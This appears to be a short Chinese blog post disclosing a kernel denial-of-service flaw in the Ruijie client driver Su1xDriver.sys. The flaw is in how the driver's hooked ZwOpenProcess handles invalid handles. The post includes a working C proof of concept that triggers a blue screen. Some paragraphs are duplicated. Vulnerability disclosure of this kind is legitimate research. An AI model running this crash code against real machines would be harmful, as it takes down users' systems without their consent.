锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
欢迎交流 :-)
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
代码:
/*
Test for RuiJie
*/
#include<stdio.h>
#include<windows.h>
HMODULE hMod;
PVOID Func;
int main()
{
hMod = LoadLibrary("ntdll.dll");
Func = GetProcAddress(hMod ,"ZwOpenProcess");
__asm{
push 0x80000000
push 0
push 0
push 0
call Func
}
return 0;
}
本文披露了福州大学使用的星网锐捷上网客户端中存在的Su1xDriver.sys内核拒绝服务漏洞。该漏洞由于未正确过滤无效句柄导致,攻击者可通过构造特定参数触发蓝屏,实现内核拒绝服务。
1159

被折叠的 条评论
为什么被折叠?



